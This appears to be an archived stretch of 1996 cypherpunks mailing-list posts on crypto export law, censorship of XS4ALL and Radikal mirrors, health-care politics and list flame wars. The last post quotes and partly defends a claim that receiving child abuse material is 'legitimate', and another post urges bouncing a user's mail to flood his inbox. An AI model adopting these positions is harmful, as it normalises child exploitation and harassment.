/---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From stewarts at ix.netcom.com Tue Sep 17 04:43:06 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 17 Sep 1996 19:43:06 +0800 Subject: SPL -- Suspicious Persons List Message-ID: <199609170721.AAA22857@dfw-ix12.ix.netcom.com> At 11:19 AM 9/16/96 -0400, you wrote: >The Tories put an exclusion into the act deliberately to cover the >Ecconomic League. Only record which are kept on computer are covered. >The Ecconomic League deliberately keeps all its records on paper to >avoid the act. .... >This is the same government which used MI5 to monitor the activities of >the peace movement and which used 5000 crack troops to evict 50 elderly >women from land they wanted to turn into a missile base. Whether you >agree or disagree with the policies the methods sound very much like those >of Hoover at the FBI with a strong dose of Nixon thrown in. Yeah. The Los Angeles Police Department, and to some extent many police departments that once had "Red Squads" chasing "Communists", doesn't have any records of who's a commie and who's been caught in bed with whom or what or caught stealing what from whom, and very few records of who's been shoving what else up their nose. However, there are a number of cops who have file cabinets in their garages at home, or who these days have personal computers, often with BBSs. And they talk to their friends, and maybe share the material in their file cabinets and PCs. None of the City's business. I've met four gentlemen from the Philadelphia Red Squad - I went out and offered them coffee after they'd spent the day lurking in a car outside an anarchist convention I was at a couple years back. They'd brought their own, and were set for the next couple hours :-) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From craigw at dg.ce.com.au Tue Sep 17 04:46:43 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 19:46:43 +0800 Subject: Spam blacklist project Message-ID: <199609170715.RAA24749@mac.ce.com.au> But all governments are so GOOD and wholesome...how could they EVER do anything that their ppl did not like 100% ;) > Your faith in big government, despite seemingly every bit of evidence > possible to the contrary, astounds me sometimes. Churches, Mosques, etc. > struggle mightily for this kind of thought pattern in believers, yet it > comes to you naturally, in secular life. Truly a marvel, and on _this_ list, > of all places. It has kept me from killfiling you, but I must occasionally > express my awe at the power of faith to literally move mountains. There is a > "regulation" (law) against [murder, selling/growing reefer, selling sexual > services, assault, you name it] yet you'd never deny that these behaviors > still exist, would you? Somehow, though, you still seem to manage to think > that spamming slimeballs will just disappear with more regulations. It's > astonishing. > ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From dthorn at gte.net Tue Sep 17 05:48:30 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 17 Sep 1996 20:48:30 +0800 Subject: "But if it saves just one child." In-Reply-To: <199609160656.AAA23532@InfoWest.COM> Message-ID: <323D617C.79B5@gte.net> attila wrote: > In , on 09/15/96 > at 03:51 PM, tcmay at got.net (Timothy C. May) said: > = .The rallying cry heard so often these days: "But if it saves just > one child." > "...now that we have saved just one child, save another, a boy > and a girl, so they breed,and we can justify our jobs feeding: > "just one more child...." > "...give until you bleed." > = .(Hillary also thinks it takes a village to save the children.) > yeah, a _global_ village with good King Hillary. > welcome to "Logan's Run" (and Fahrenheit 451) I've been looking for a good price on a large Hillary Clinton button for several weeks now. The best I've seen so far was $3 at a booth in the Santa Monica 3rd Street Promenade. Since I want to give the absolute least cash possible to these people (less than none, preferably) I'd just like to know if anyone knows of a better deal. From gnu at toad.com Tue Sep 17 05:52:35 1996 From: gnu at toad.com (John Gilmore) Date: Tue, 17 Sep 1996 20:52:35 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building Message-ID: <199609170744.AAA07272@toad.com> When: Friday, September 20, 1996, 11:45AM (hearing starts at Noon) Where: Federal Building, 450 Golden Gate Avenue, San Francisco; Judge Marilyn Hall Patel's courtroom upstairs. (two blocks east of Van Ness Avenue and Golden Gate Avenue, in the Civic Center neighborhood) What: Dan Bernstein's case to declare the export controls unconstitutional will hold a hearing in which the judge will cross-examine both Dan's lawyers and the government's lawyers, to decide whether to strike down the ITAR and AECA as unconstitutional, throw out the case, or do something in between. Who: me, Dan's lawyers, NSA & State & Justice dept lawyers, the press, and as many cypherpunks and friends-of-encryption as will show up. Don't forget your costume! Formal dress is strongly recommended; you're going to court, remember! Why: To see justice in action; to hang out with your friends; to be there while cryptographic history is made; to get your picture in the Feb '97 Wired Japan. PS: Date: Mon, 16 Sep 1996 19:30:29 -0700 (PDT) To: gnu at toad.com Subject: I've got "go ahead" from my editor From: Rika ... I have read about "cypherpunk dress up day" and found it a good oppotunity to let Japanese reader of Wired know about law suit and circumustance of encription exporting, as well as actual activity of cypherpunk people. So far, "cypherpunk" is more like just a image/notion than actual living people to Japanese. If I can take a couple of group pictures after the court, I can develop an article for their Feb '97 issue. I hope it is ok with you and lots of lots of people show up this friday! Rika ... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ $B3^86(J $BMx9a(J $B")(J183 $BEl5~ETI\Cf;TGr;eBf#6(J-13-13 Rika Kasahara POBox 25427, Los Angeles, CA 90025 Voice:+1-310-478-0653 Fax :+1-310-478-0493 From craigw at dg.ce.com.au Tue Sep 17 06:51:27 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 21:51:27 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609170954.TAA23685@mac.ce.com.au> >And this? Mr. Green hardly advocated an authortarian regime, quite the >contrary, he simply advocated one which refused to hand out money to every >outstretched hand. and the hands are usually those of a forgein government anyway...not the "starving masses". Not only is the money I pay as tax be used for funding the country I am in...but also the military in others. > In article , > Lucky Green wrote: > > On Sun, 15 Sep 1996, Dale Thorn wrote: > > > Just a comment: "The world population really should go back to around > > > one billion", etc. And how could we achieve that without severe govt. > > > oppression, one wonders? > > > > Quite simple. End all food and medical aid to developing countries paid > > for with money stolen at gunpoint from our citizens. Or make Norplant > > implants the condition for financial/in kind aid. Both US and > > abroad. > >And this? Mr. Green hardly advocated an authortarian regime, quite the >contrary, he simply advocated one which refused to hand out money to every >outstretched hand. ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From jk at stallion.ee Tue Sep 17 08:07:03 1996 From: jk at stallion.ee (=?ISO-8859-1?Q?J=FCri_Kaljundi?=) Date: Tue, 17 Sep 1996 23:07:03 +0800 Subject: no internet gambling Message-ID: >From todays Baltic News Service newswire (my free translation): According to the ministry of finance of Estonia, they will not give any licences or permission to organize Internet gambling or lotteries in Estonia. The reason given was, that arranging lotteries on the Internet would take the activity outside from Estonia. According to the news, the only Internet gambling licences given out are in Liechtenstein and Ahvenamaa (part of Finland). My question is: how easy it is to get a licence for Internet casino in either Liechtenstein or some off-shore country (Belize, Bahamas etc) ? I believe Belize was one of the first to sign legislation on Internet gambling, does anyone have more information about the costs and requirements? J�ri Kaljundi AS Stallion jk at stallion.ee From felipe at xs4all.nl Tue Sep 17 08:12:17 1996 From: felipe at xs4all.nl (Felipe Rodriquez) Date: Tue, 17 Sep 1996 23:12:17 +0800 Subject: German providers continue to censor XS4ALL network Message-ID: <199609170958.LAA04976@xs1.xs4all.nl> Released by: XS4ALL Internet BV Date : 17-september-1996 Author : Felipe Rodriquez (felipe at xs4all.nl) *** PRESS RELEASE *** GERMAN PROVIDERS CONTINUE TO CENSOR XS4ALL NETWORK German providers have continued their ip-filtering actions against dutch provider XS4ALL. These ip-filtering actions where started after the German Authorities ordered the providers to block access to a specific document on the XS4ALL website. The document is not illegal in Holland, and is the property of one of XS4ALL's customers. So far German authorities have not contacted XS4ALL, no official requests where made to remove these documents from our server. Xs4all customers are prevented from communicating with German internetusers, because Email is not passed through a number of German internet routers. Xs4all customers are prevented from accessing German websites. Therefore German providers, particularily EUnet Germany GmbH, are violating article 10 of European Convention on Human Rights: "Everyone has the right to freedom of expression. this right shall include freedom to hold opinions and to receive and impart information an ideas without interference by public authority and regardless of frontiers." They are preventing our Xs4all subscribers to execute their rights of free expression. Some of our customers have terminated their account at Xs4all, because of these restrictions, that were imposed by German providers, after an order from the German government. These restrictions have caused a major disruption on the business interests of XS4ALL Internet BV. From pgut001 at cs.auckland.ac.nz Tue Sep 17 09:21:00 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Wed, 18 Sep 1996 00:21:00 +0800 Subject: [Long] A history of Netscape/MSIE problems Message-ID: <84296097823886@cs26.cs.auckland.ac.nz> In case anyone's interested, I've finally found the source I used for the claim that RC2/RC4 were exportable if the details were kept quiet: "Details about them [RC2 and RC4] have not been published (including by patenting) in order to maintain their special export status". -- RSA FAQ, version 1.0, draft 1e, 14 September 1992, p.40. This makes sense - the NSA wouldn't want the details published to stop non-US non-crippled versions appearing, and I can't really imagine RSADSI volutarily not patenting a new algorithm. Peter. From tank at xs4all.nl Tue Sep 17 09:49:41 1996 From: tank at xs4all.nl (tank) Date: Wed, 18 Sep 1996 00:49:41 +0800 Subject: radikal update 17-9-1996 Message-ID: <199609171032.MAA05213@xs2.xs4all.nl> URL of the main radikal-site has changed: ********************************* * http://www.xs4all.nl/~radikal * ********************************* We need more mirrors to stop Germany censoring the radikal and the internet. As you can see, free speach is not a gift, but something you have to fight for. Join the struggle ! If you got a mirror up and running let it know. Send your url to: tank at xs4all.nl *********************************************************************** ** Radikal Mirrors ** ** *********************************************************************** Receive Radikal 154 by email: Send a empty message to radikal at xs4all.nl and you receive issue 154 by mail. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Read the radikal by calling the netherlands (25 numbers). All telefonnr. are listed at the end of this mail. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Download the radikal archive: http: http://www.xs4all.nl/~bslash/radikal.tar.gz Radikal-site unix http://www.xs4all.nl/~bslash/radi.zip Radikal-site dos-zip archive ftp: ftp://utopia.hacktic.nl/pub/replay/pub/incoming Radikal 154 in plaintext ASCII http://www.xs4all.nl/~radikal/radi154.tgz Radikal 154 unix http://www.xs4all.nl/~radikal/radi154.zip Radikal 154 dos-zip If you got your mirror up and running let us know +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Special mirror: de.soc.zensur de.org.politik.spd http://www.altavista.digital.com usenet-search for radikal.zip +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Radikal-sites: 1.http://www.xs4all.nl/~radikal 2.http://burn.ucsd.edu/%7Eats/RADIKAL/ Arm the Spirit statement "Radikal Mirror Site At ATS WWW Page" 3.http://www.jca.or.jp/~taratta/mirror/radikal/ 4.http://www.serve.com/~spg/ 5.http://huizen.dds.nl/~radikal 6.http://www.canucksoup.net/radikal/index.html 7.http://www.ecn.org/radikal 8.http://www.well.com/~declan/mirrors/ 9.http://www.connix.com/~harry/radikal/index.htm 10.http://www.ganesa.com/radikal/ 11.http://www.denhaag.org/~radikal 12.http://www.knooppunt.be/~daniel/radikal 13.http://emma.unm.edu/radikal 14.http://www.tacacs.com/radikal/" 15.http://www.dsvenlo.nl/~vvd/radikal/ 16.http://www.why.net/home/static/radi 17.http://users.abcs.com/dockmstr/mirror/radikal/index.htm 18.http://www.xs4all.nl/~jeroenw/radikal/ 19.http://home.ipr.nl/~radikal/ 20.http://www.dreamy.demon.co.uk/occam/ 21.http://www.ibmpcug.co.uk/~irdial/live_free/ 22.http://zero.tolerance.org/radi/index.htm 23.http://www.meaning.com/library/radikal/ 24.http://www.xs4all.nl/~irmed/radikal/ 25.http://www.walli.uwasa.fi/~tviemero/radikal 26.http://www.sko.it/~sfede/radi/index.htm 27.http://www.bart.nl/~sz/index.html 28.http://bellp.med.yale.edu/index.htm 29.http://www.euronet.nl/users/funest/radi/index.htm 30.http://fine.com/~rsr/radikal 31.http://www.lab.net/radikal 32.http://www.charm.net/~gbarren/radikal 33.http://login.datashopper.dk/~pethern/radikal/ 34.http://www.interlaw.com 35.http://hyperreal.com/~rich/radikal/index.html 36.http://www.citinv.it/iniziative/info/radikal/ Phone: Call and login as "new". So first dail the international number +31 (hollands international code) and than one of these numbers. Amsterdam Zoetermeer Maarssen 020 5350535, V.34 079 3611011, V.34 0346 550455, V.34 020 4223422, UUCP 079 3600800, ISDN PPP 0346 553613, ISDN PPP 020 6265060, ZyXEL 079 3630569, ISDN X.75 0346 555285, ISDN X.75 020 4229700, ISDN PPP 020 4206782, ISDN X.75 Hoorn Geleen Leeuwarden 0229 212177, V.34 046 4789478, V.34 058 2157815, V.34 0229 219717, ISDN PPP 046 4230555, ISDN PPP 058 2130910, ISDN PPP Goes Assen 0113 252900, V.34 0592 331531, V.34 0113 270110, ISDN PPP 0592 331278, ISDN PPP Willemstad Deurne 0168 472472, V.34 0493 323344, V.34 0168 476472, ISDN PPP 0493 351566, ISDN PPP From perry at piermont.com Tue Sep 17 10:23:15 1996 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 18 Sep 1996 01:23:15 +0800 Subject: Spam blacklist project In-Reply-To: <9609170603.AA03193@etna.ai.mit.edu> Message-ID: <199609171356.JAA27539@jekyll.piermont.com> hallam at ai.mit.edu writes: > Well if some people find it amazing that there are people out there > who agree with the 98.8% of people who did not vote Libertarian at the > last election then so be it. Most people in this country also think that Cheez Whiz is food, Philllll. Perry From dustman at athensnet.com Tue Sep 17 10:42:26 1996 From: dustman at athensnet.com (Dustbin Freedom Remailer) Date: Wed, 18 Sep 1996 01:42:26 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609171255.IAA00172@godzilla.athensnet.com> jbugden at smtplink.alis.ca wrote: >> By spreading the risk you minimize the cost. <...> >Canada has a single payer system Translation: a more palatable term for "socialised medicine" >and we spend about two thirds as much as the >U.S. on health care as a percentage of G.N.P. We manage to insure all Canadians >while about 35% of people in the U.S. have *no* health insurance. So why in the world do those crazy Canadians keep coming here for medical care, when they can get it from your compassionate bureaucrats? What could be their compulsion to spend money they don't need to spend? Charitable impulses toward our impoverished medical profession? BTW, looking at historical costs of medical care and the level of government involvement, it is safe to say that the US has too much socialism in our medical system right now, and that it what's making the best system (ours) so expensive when it would not be otherwise. >Yes, the insurance premium is not optional. True. >Yes, it *is* cheaper. *False.* It is cheaper for _SOME_, and more expensive for others (in terms of either money, or waiting with pain, or both) and has an _ultimately high cost [the death penalty] for still others, who are forced to wait for the "compassionate" bureaucrats [who naturally know more about what patients' bodies need than the patients do themselves] to give them permission to get medical care they would otherwise purchase before death. From attila at primenet.com Tue Sep 17 11:24:03 1996 From: attila at primenet.com (attila) Date: Wed, 18 Sep 1996 02:24:03 +0800 Subject: IBM_gak In-Reply-To: Message-ID: <199609171425.IAA10655@InfoWest.COM> In , on 09/17/96 at 01:13 AM, Black Unicorn said: = .On Mon, 16 Sep 1996, Dr.Dimitri Vulis KOTM wrote: = .> = .> Apparently, senile Tim May (fart) is a Clinton administration troll planted = .> here to sabotage any discussions of actual crypto work and to flood this = .> mailing list with lies and personal attacks and to make it unusable. = .> = .If so, it would seem you fell for it and failed to resist the temptation = .to type the word "fart" out- yet again. and here I took the trouble to take Dr. Dimitri off the kill list; dang! time wasted again; back he goes to [filter...] > /dev/null. Isn't procmail a nice toy?!? -- Dr. Dimitri is like diapers. They both need changing regularly, and for the same reason. From proff at suburbia.net Tue Sep 17 11:53:08 1996 From: proff at suburbia.net (Julian Assange) Date: Wed, 18 Sep 1996 02:53:08 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant In-Reply-To: <199609170703.RAA21552@mac.ce.com.au> Message-ID: <199609171531.BAA22478@suburbia.net> > And what am I paying for...to protect the status quo. I believe that > there is more than enough help for ppl available. They just need to > get off their butts and work. Do we really need your amatuer political views? -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From mthompso at qualcomm.com Tue Sep 17 12:28:50 1996 From: mthompso at qualcomm.com (Michelle Thompson) Date: Wed, 18 Sep 1996 03:28:50 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: <2.2.32.19960917161601.002ee52c@strange.qualcomm.com> >From: kwheeler at intellinet.com >Date: Tue, 17 Sep 1996 10:54:35 -0500 >X-Sender: kwheeler at intellinet.com >To: Michelle Thompson >Subject: Re: Assassination Politics, was Kiddie porn on the Internet Interesting information from a friend of mine- >An american can not serve for pay for a position in another military >that could be filled by local populace. I may have my jurisdiction >wrong tho, this could be an international law not a US law. >Basically, you can't go be a grunt or an assasin in another country, >because they can find their own, but one can, however, fly P-40 Warhawks for >China in 1941 because there were no chinese planes/pilots. Guys from soldier >of fortune (tho they do volunteer work) could be hired as 'experts' at >whatever, removing mines, etc... It's very touchy. But, the worst thing about >it all, is that the geneva convention doesn't protect mercenaries....so awful >things could be done to them, and the world wouldn't see that as war crimes. > >-Keith I believe that with the breakdown of the traditional sense of sovereignty, mercenary activity, whether military or commercial in nature, will increase. Engineering seems to be quite mercenary already, and very international. Marketing and advertising, to a novice (me), seem to be going the same way. Hence my interest in cryptography. Data security is essential in international engineering projects. Michelle Thompson From jbugden at smtplink.alis.ca Tue Sep 17 12:36:53 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Wed, 18 Sep 1996 03:36:53 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica... Message-ID: <9608178429.AA842985398@smtplink.alis.ca> Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Political rant) Black Unicorn >On Mon, 16 Sep 1996 jbugden at smtplink.alis.ca wrote: >> Specifically, that anyone can "save for a rainy day" and still not be >> able to provide for events that can always happen: Heart attack, >> stroke, car accident, pinched nerve that leaves you in excruciating >> pain and unable to work for several years. > >Understand what it is you are saying. > >You are saying that everyone on the planet has a right to health > insurance and disability insurance whether they can afford it or not. > This is folly. The result is serious moral hazard problems. Almost, but not quite. I'm saying that within our two countries at least (Canada, U.S.) everyone could have access to medically necessary procedures because the *society as a whole* can afford it. I understand moral hazard and risk pool seperation. I also understand that the insurance bureacracy required to manage much of the U.S. health care system absorbs much of the money going into the system. Managing risk pool seperation proves to be expensive, or perhaps just very profitable. > Social safety nets prevent rioting by the lower classes, revolution and > general civil disorder because they appease the masses. Indeed this > is a form of health and life insurance for the middle and upper classes. Absolutely. And it is a scheme that many of the lower classes pay into. Since it is to our mutual benefit (yours and mine), I choose not complain about it. > Spreading the risk, by itself, does NOT reduce cost. > You must properly PRICE risk. Agreed. But there is a balance between accurately pricing the risk and minimizing the cost of the bureacracy that polices this pricing. There are also many ways to modify behaviour, not all of them direct. We only need a correlation here, not causation. For example, high taxes on smoking and drinking or spot checks for drunk driving. All of these correlate with a reduction in high risk behaviour and a reduction in health costs. Yes, there are people who will engage in high risk behaviour. Yes, they will still receive treatment. No, it is not worth tracking down all of these people. You may also get better privacy because no insurance company is collecting personal data in order to minimize their risk. A Suspicious Persons List is only one manifestation of this type of intrusion. This privacy issue may only increase as genetic screening becomes widespread. There is much potential for moral hazard when the PRICE for your insurance is affected by the accuracy of your disclosure. How will they ever know... Fact: Canada spends less than the U.S. per capita on health care, while covering more people in percentage terms. Ciao, James, qui pete les bretelles du Canada. And he brought the present unto Eglon king of Moab: and Eglon was a very fat man. [Judges 3:17] "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies. The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ "A foolish consistency is the hobgoblin of little minds." - Emerson From paul at fatmans.demon.co.uk Tue Sep 17 12:52:05 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Wed, 18 Sep 1996 03:52:05 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <842976189.23679.0@fatmans.demon.co.uk> > tcmay at got.net (Timothy C. May) writes: > > Crypto Anarchy means getting rid of deadwood the old-fashioned way. > > Starting with the lying old fart himself. The Vilus bot is at it again, I suggest a 2 line cypherpunks FAQ along the following lines: Q> What do it do when I join the list? A> Killfile *@bwalk.dm.net Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From snow at smoke.suba.com Tue Sep 17 14:08:42 1996 From: snow at smoke.suba.com (snow) Date: Wed, 18 Sep 1996 05:08:42 +0800 Subject: did you go to school? In-Reply-To: <32399315.19E7@precipice.v-site.net> Message-ID: On Fri, 13 Sep 1996, HipCrime wrote: > >> THIN SLICES CUT FROM OUR PRECIOUS FORESTS. > > "OUR?" Since when did my trees become partially yours? > > JMR > JMR, it's hard to believe that your English education is SO LACKING, > that you missed the fact, that in my sentence quoted above, the word > "ours" refers to MANKIND IN GENERAL, not me personally. > Go sit in the corner with the duncecap on, and don't come out until you > can read an 8th grade piece of literature (with full comprehension). It's no wonder you're homeless. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From Adamsc at io-online.com Tue Sep 17 14:29:38 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 05:29:38 +0800 Subject: 10 minute delay considered inconsequential Message-ID: <19960917171059750.AAA156@IO-ONLINE.COM> On Wed, 11 Sep 1996 22:50:22 -0700, Timothy C. May wrote: >>I've always wondered if the makers of mailer software couldn't include a delay >>option, so that, say, a message might be held for 10 minutes and then sent. >>Imagine how many of the "Sorry about x; I meant y" posts we'd never see. > >I expect there would be little effect. I suspect most of us write articles, >send them out, and only notice the mistakes, typos, whatever when they are >pointed out. True. I guess what we need is an AI mailer that would do something like "Message #324 is rather confusing - did you really mean x?". Oh well. . . # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From declan at well.com Tue Sep 17 14:31:08 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 18 Sep 1996 05:31:08 +0800 Subject: Child pornography -- Expert witness for Federal jury trial Message-ID: Folks, I just got a call from two Federal Public Defenders whose client is charged with possession of child pornography stored in the /tmp directory of a Unix system, in a zip'd file. (These lawyers seem to be reasonably cyber-savvy, and told me they're following what I've been writing about cyber-liberties.) There's evidence saying that other people were using the account at that time, and the attorneys have the relevant wtmp/utmp files. There's also no evidence saying an actual child was exploited -- given the nature of the images, they may have been morphed. I don't think the defendant is accused of *making* them; he's only accused of *possessing* them. The case goes to jury trial soon in a Federal District Court. If anyone is interested in testifying as an expert witness in this case about Unix tech foo (and is qualified to do so), please let me know and I'll pass along your info. I believe at least your expenses would be paid. Here's an opportunity to ensure justice is done and not just rant in cyberspace... :) -Declan (Note I have no idea if the guy is indeed guilty of possessing JPGs the government has banned. What I do know is that any defendant deserves a fair trial and the government must prove that he's guilty of the crimes for which he's charged. And if anyone does molest a child, I say lock 'em up for a good long time.) From zachb at netcom.com Tue Sep 17 14:50:46 1996 From: zachb at netcom.com (Z.B.) Date: Wed, 18 Sep 1996 05:50:46 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <842976189.23679.0@fatmans.demon.co.uk> Message-ID: On Mon, 16 Sep 1996 paul at fatmans.demon.co.uk wrote: > > > The Vilus bot is at it again, I suggest a 2 line cypherpunks FAQ > along the following lines: > > Q> What do it do when I join the list? > A> Killfile *@bwalk.dm.net > How about we go just a little farther than that and set up Procmail to bounce all of his messages back to him? I'd hate to see his inbox if enough of us started doing that! > > Datacomms Technologies web authoring and data security > Paul Bradley, Paul at fatmans.demon.co.uk > Http://www.fatmans.demon.co.uk/crypt/ > "Don`t forget to mount a scratch monkey" > --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From Adamsc at io-online.com Tue Sep 17 14:51:27 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 05:51:27 +0800 Subject: common sense Message-ID: <19960917173913750.AAA74@IO-ONLINE.COM> On Thu, 12 Sep 1996 16:04:14 -0700, HipCrime wrote: >> And rather than "dispensing drugs in clinics," why not simply >> scrap the drug laws entirely? People have a *right* to do as >> they please with their bodies. >Let's hear it for common sense. It's the first decent posting I've >seen to this list. Tell me, how do you walk with that huge chip on your shoulder? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From paul at fatmans.demon.co.uk Tue Sep 17 14:52:47 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Wed, 18 Sep 1996 05:52:47 +0800 Subject: CU foward post, netcopped again! Message-ID: <842976184.23597.0@fatmans.demon.co.uk> > >what is being punished here is not the exploitation of children, which is > > wrong and must be prevented, but the private thoughts of those who > > produce and recieve this material, which are totally private and > > legitimate. > > There is nothing "legitimate" about fucking children, fantasising about > fucking children, or looking at pictures of people fucking children. > > The dangers of this debate are all too apparent, and if this sort of > quote were to reach the tabloid audience I hardly think it would be a > positive contribution to the image of CommUnity... Oh no! - I`ve been netcopped on the CommUnity list *AGAIN*, long live cypherpunks, the last bastion of free speech on the net!!!! ;-) But seriously, this does highlight what we are up against, when CommUnity (for US readers CommUnity, abreviated CU sometimes, is like a UK version of the EFF), supposedly a free speech and online liberties organisation, has posters (and this one is pretty typical) like this which clearly cover all debate on a subject area as "padophilia" if they try to explore the issues any more deeply than saying that fucking children is wrong... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP 